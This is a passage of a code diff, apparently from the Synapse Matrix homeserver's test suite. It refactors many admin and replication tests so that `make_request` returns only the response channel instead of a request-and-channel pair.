" {\"auth\": {\"session\": session, \"type\": \"m.login.dummy\"}},", + "- ) # type: SynapseRequest, FakeChannel", + "+ )", + " self.assertEqual(channel_2.code, 200)", + "@@ -75,3 +75,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + " site_1 = self._hs_to_site[worker_hs_1]", + "- request_1, channel_1 = make_request(", + "+ channel_1 = make_request(", + " self.reactor,", + "@@ -81,3 +81,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + " {\"username\": \"user\", \"type\": \"m.login.password\", \"password\": \"bar\"},", + "- ) # type: SynapseRequest, FakeChannel", + "+ )", + " self.assertEqual(channel_1.code, 401)", + "@@ -89,3 +89,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + " site_2 = self._hs_to_site[worker_hs_2]", + "- request_2, channel_2 = make_request(", + "+ channel_2 = make_request(", + " self.reactor,", + "@@ -95,3 +95,3 @@ class ClientReaderTestCase(BaseMultiWorkerStreamTestCase):", + " {\"auth\": {\"session\": session, \"type\": \"m.login.dummy\"}},", + "- ) # type: SynapseRequest, FakeChannel", + "+ )", + " self.assertEqual(channel_2.code, 200)", + "diff --git a/tests/replication/test_multi_media_repo.py b/tests/replication/test_multi_media_repo.py", + "index 83afd9fd2..d1feca961 100644", + "--- a/tests/replication/test_multi_media_repo.py", + "+++ b/tests/replication/test_multi_media_repo.py", + "@@ -70,3 +70,3 @@ class MediaRepoShardTestCase(BaseMultiWorkerStreamTestCase):", + " resource = hs.get_media_repository_resource().children[b\"download\"]", + "- _, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "diff --git a/tests/replication/test_sharded_event_persister.py b/tests/replication/test_sharded_event_persister.py", + "index 77fc3856d..8d494ebc0 100644", + "--- a/tests/replication/test_sharded_event_persister.py", + "+++ b/tests/replication/test_sharded_event_persister.py", + "@@ -182,3 +182,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", + " # Do an initial sync so that we're up to date.", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor, sync_hs_site, \"GET\", \"/sync\", access_token=access_token", + "@@ -208,3 +208,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", + " # stream IDs.", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -238,3 +238,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -263,3 +263,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -281,3 +281,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", + " # filtering results based on the vector clock portion.", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -294,3 +294,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", + " # again. This tests that pagination isn't completely broken.", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -309,3 +309,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", + " # Paginating forwards should give the same results", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -320,3 +320,3 @@ class EventPersisterShardTestCase(BaseMultiWorkerStreamTestCase):", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "diff --git a/tests/rest/admin/test_admin.py b/tests/rest/admin/test_admin.py", + "index 67d887839..0504cd187 100644", + "--- a/tests/rest/admin/test_admin.py", + "+++ b/tests/rest/admin/test_admin.py", + "@@ -44,3 +44,3 @@ class VersionTestCase(unittest.HomeserverTestCase):", + " def test_version_string(self):", + "- request, channel = self.make_request(\"GET\", self.url, shorthand=False)", + "+ channel = self.make_request(\"GET\", self.url, shorthand=False)", + "@@ -70,3 +70,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", + " # Create a new group", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -86,3 +86,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", + " url = \"/groups/%s/admin/users/invite/%s\" % (group_id, self.other_user)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", url.encode(\"ascii\"), access_token=self.admin_user_tok, content={}", + "@@ -92,3 +92,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", + " url = \"/groups/%s/self/accept_invite\" % (group_id,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", url.encode(\"ascii\"), access_token=self.other_user_token, content={}", + "@@ -103,3 +103,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/delete_group/\" + group_id", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -125,3 +125,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", + " url = \"/groups/%s/profile\" % (group_id,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", url.encode(\"ascii\"), access_token=self.admin_user_tok", + "@@ -136,3 +136,3 @@ class DeleteGroupTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/joined_groups\".encode(\"ascii\"), access_token=access_token", + "@@ -218,3 +218,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", + " \"\"\"Ensure a piece of media is quarantined when trying to access it.\"\"\"", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -243,3 +243,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/media/quarantine/example.org/abcde12345\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", url.encode(\"ascii\"), access_token=non_admin_user_tok,", + "@@ -256,3 +256,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/room/!room%3Aexample.com/media/quarantine\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", url.encode(\"ascii\"), access_token=non_admin_user_tok,", + "@@ -284,3 +284,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", + " # Attempt to access the media", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -301,3 +301,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(\"POST\", url, access_token=admin_user_tok,)", + "+ channel = self.make_request(\"POST\", url, access_token=admin_user_tok,)", + " self.pump(1.0)", + "@@ -353,3 +353,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(\"POST\", url, access_token=admin_user_tok,)", + "+ channel = self.make_request(\"POST\", url, access_token=admin_user_tok,)", + " self.pump(1.0)", + "@@ -397,3 +397,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", url.encode(\"ascii\"), access_token=admin_user_tok,", + "@@ -439,3 +439,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", url.encode(\"ascii\"), access_token=admin_user_tok,", + "@@ -455,3 +455,3 @@ class QuarantineMediaTestCase(unittest.HomeserverTestCase):", + " # Attempt to access each piece of media", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "diff --git a/tests/rest/admin/test_device.py b/tests/rest/admin/test_device.py", + "index cf3a00759..248c4442c 100644", + "--- a/tests/rest/admin/test_device.py", + "+++ b/tests/rest/admin/test_device.py", + "@@ -52,3 +52,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", + "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", + "@@ -57,3 +57,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"PUT\", self.url, b\"{}\")", + "+ channel = self.make_request(\"PUT\", self.url, b\"{}\")", + "@@ -62,3 +62,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"DELETE\", self.url, b\"{}\")", + "+ channel = self.make_request(\"DELETE\", self.url, b\"{}\")", + "@@ -71,3 +71,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url, access_token=self.other_user_token,", + "@@ -78,3 +78,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", self.url, access_token=self.other_user_token,", + "@@ -85,3 +85,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"DELETE\", self.url, access_token=self.other_user_token,", + "@@ -101,5 +101,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -108,5 +106,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"PUT\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"PUT\", url, access_token=self.admin_user_tok,)", + "@@ -115,5 +111,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"DELETE\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", + "@@ -131,5 +125,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -138,5 +130,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"PUT\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"PUT\", url, access_token=self.admin_user_tok,)", + "@@ -145,5 +135,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"DELETE\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", + "@@ -160,5 +148,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -167,5 +153,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"PUT\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"PUT\", url, access_token=self.admin_user_tok,)", + "@@ -173,5 +157,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"DELETE\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", + "@@ -199,3 +181,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + " body = json.dumps(update)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -210,5 +192,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + " # Ensure the display name was not updated.", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -229,5 +209,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"PUT\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"PUT\", self.url, access_token=self.admin_user_tok,)", + "@@ -236,5 +214,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + " # Ensure the display name was not updated.", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -249,3 +225,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"display_name\": \"new displayname\"})", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -259,5 +235,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + " # Check new display_name", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -270,5 +244,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -293,3 +265,3 @@ class DeviceRestTestCase(unittest.HomeserverTestCase):", + " # Delete device", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"DELETE\", self.url, access_token=self.admin_user_tok,", + "@@ -325,3 +297,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", + "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", + "@@ -336,5 +308,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=other_user_token,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=other_user_token,)", + "@@ -348,5 +318,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v2/users/@unknown_person:test/devices\"", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -361,5 +329,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", url, access_token=self.admin_user_tok,)", + "@@ -375,5 +341,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", + " # Get devices", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -393,5 +357,3 @@ class DevicesRestTestCase(unittest.HomeserverTestCase):", + " # Get devices", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -433,3 +395,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"POST\", self.url, b\"{}\")", + "+ channel = self.make_request(\"POST\", self.url, b\"{}\")", + "@@ -444,5 +406,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"POST\", self.url, access_token=other_user_token,", + "- )", + "+ channel = self.make_request(\"POST\", self.url, access_token=other_user_token,)", + "@@ -456,5 +416,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v2/users/@unknown_person:test/delete_devices\"", + "- request, channel = self.make_request(", + "- \"POST\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"POST\", url, access_token=self.admin_user_tok,)", + "@@ -469,5 +427,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"POST\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"POST\", url, access_token=self.admin_user_tok,)", + "@@ -481,3 +437,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"devices\": [\"unknown_device1\", \"unknown_device2\"]})", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -512,3 +468,3 @@ class DeleteDevicesRestTestCase(unittest.HomeserverTestCase):", + " body = json.dumps({\"devices\": device_ids})", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "diff --git a/tests/rest/admin/test_event_reports.py b/tests/rest/admin/test_event_reports.py", + "index 11b72c10f..aa389df12 100644", + "--- a/tests/rest/admin/test_event_reports.py", + "+++ b/tests/rest/admin/test_event_reports.py", + "@@ -76,3 +76,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", + "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", + "@@ -86,5 +86,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.other_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.other_user_tok,)", + "@@ -98,5 +96,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -113,3 +109,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=5\", access_token=self.admin_user_tok,", + "@@ -128,3 +124,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=5\", access_token=self.admin_user_tok,", + "@@ -143,3 +139,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=5&limit=10\", access_token=self.admin_user_tok,", + "@@ -158,3 +154,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -178,3 +174,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -198,3 +194,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -220,3 +216,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + " # fetch the most recent first, largest timestamp", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?dir=b\", access_token=self.admin_user_tok,", + "@@ -236,3 +232,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + " # fetch the oldest first, smallest timestamp", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?dir=f\", access_token=self.admin_user_tok,", + "@@ -256,3 +252,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?dir=bar\", access_token=self.admin_user_tok,", + "@@ -269,3 +265,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=-5\", access_token=self.admin_user_tok,", + "@@ -281,3 +277,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=-5\", access_token=self.admin_user_tok,", + "@@ -295,3 +291,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + " # Number of results is the number of entries", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=20\", access_token=self.admin_user_tok,", + "@@ -306,3 +302,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + " # Number of max results is larger than the number of entries", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=21\", access_token=self.admin_user_tok,", + "@@ -317,3 +313,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + " # Number of max results is smaller than the number of entries", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?limit=19\", access_token=self.admin_user_tok,", + "@@ -329,3 +325,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + " # `next_token` does not appear", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.url + \"?from=19\", access_token=self.admin_user_tok,", + "@@ -344,3 +340,3 @@ class EventReportsTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -401,3 +397,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(\"GET\", self.url, b\"{}\")", + "+ channel = self.make_request(\"GET\", self.url, b\"{}\")", + "@@ -411,5 +407,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.other_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.other_user_tok,)", + "@@ -423,5 +417,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"GET\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"GET\", self.url, access_token=self.admin_user_tok,)", + "@@ -436,3 +428,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", + " # `report_id` is negative", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -450,3 +442,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", + " # `report_id` is a non-numerical string", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -464,3 +456,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", + " # `report_id` is undefined", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -482,3 +474,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -498,3 +490,3 @@ class EventReportDetailTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "diff --git a/tests/rest/admin/test_media.py b/tests/rest/admin/test_media.py", + "index dadf9db66..c2b998cda 100644", + "--- a/tests/rest/admin/test_media.py", + "+++ b/tests/rest/admin/test_media.py", + "@@ -52,3 +52,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"DELETE\", url, b\"{}\")", + "+ channel = self.make_request(\"DELETE\", url, b\"{}\")", + "@@ -66,5 +66,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"DELETE\", url, access_token=self.other_user_token,", + "- )", + "+ channel = self.make_request(\"DELETE\", url, access_token=self.other_user_token,)", + "@@ -79,5 +77,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"DELETE\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", + "@@ -92,5 +88,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- \"DELETE\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", + "@@ -123,3 +117,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", + " # Attempt to access media", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -148,5 +142,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", + " # Delete media", + "- request, channel = self.make_request(", + "- \"DELETE\", url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"DELETE\", url, access_token=self.admin_user_tok,)", + "@@ -159,3 +151,3 @@ class DeleteMediaByIDTestCase(unittest.HomeserverTestCase):", + " # Attempt to access media", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "@@ -206,3 +198,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(\"POST\", self.url, b\"{}\")", + "+ channel = self.make_request(\"POST\", self.url, b\"{}\")", + "@@ -218,3 +210,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", self.url, access_token=self.other_user_token,", + "@@ -231,3 +223,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", url + \"?before_ts=1234\", access_token=self.admin_user_tok,", + "@@ -242,5 +234,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "- \"POST\", self.url, access_token=self.admin_user_tok,", + "- )", + "+ channel = self.make_request(\"POST\", self.url, access_token=self.admin_user_tok,)", + "@@ -256,3 +246,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", self.url + \"?before_ts=-1234\", access_token=self.admin_user_tok,", + "@@ -267,3 +257,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -280,3 +270,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -310,3 +300,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " now_ms = self.clock.time_msec()", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -334,3 +324,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -346,3 +336,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " now_ms = self.clock.time_msec()", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -369,3 +359,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " now_ms = self.clock.time_msec()", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -380,3 +370,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " now_ms = self.clock.time_msec()", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -403,3 +393,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " # set media as avatar", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -412,3 +402,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " now_ms = self.clock.time_msec()", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -423,3 +413,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " now_ms = self.clock.time_msec()", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -447,3 +437,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " room_id = self.helper.create_room_as(self.admin_user, tok=self.admin_user_tok)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -456,3 +446,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " now_ms = self.clock.time_msec()", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -467,3 +457,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + " now_ms = self.clock.time_msec()", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -514,3 +504,3 @@ class DeleteMediaByDateSizeTestCase(unittest.HomeserverTestCase):", + "- request, channel = make_request(", + "+ channel = make_request(", + " self.reactor,", + "diff --git a/tests/rest/admin/test_room.py b/tests/rest/admin/test_room.py", + "index 9c100050d..ca20bcad0 100644", + "--- a/tests/rest/admin/test_room.py", + "+++ b/tests/rest/admin/test_room.py", + "@@ -81,3 +81,3 @@ class ShutdownRoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/shutdown_room/\" + room_id", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -105,3 +105,3 @@ class ShutdownRoomTestCase(unittest.HomeserverTestCase):", + " url = \"rooms/%s/state/m.room.history_visibility\" % (room_id,)", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -115,3 +115,3 @@ class ShutdownRoomTestCase(unittest.HomeserverTestCase):", + " url = \"/_synapse/admin/v1/shutdown_room/\" + room_id", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\",", + "@@ -132,3 +132,3 @@ class ShutdownRoomTestCase(unittest.HomeserverTestCase):", + " url = \"rooms/%s/initialSync\" % (room_id,)", + "- request, channel = 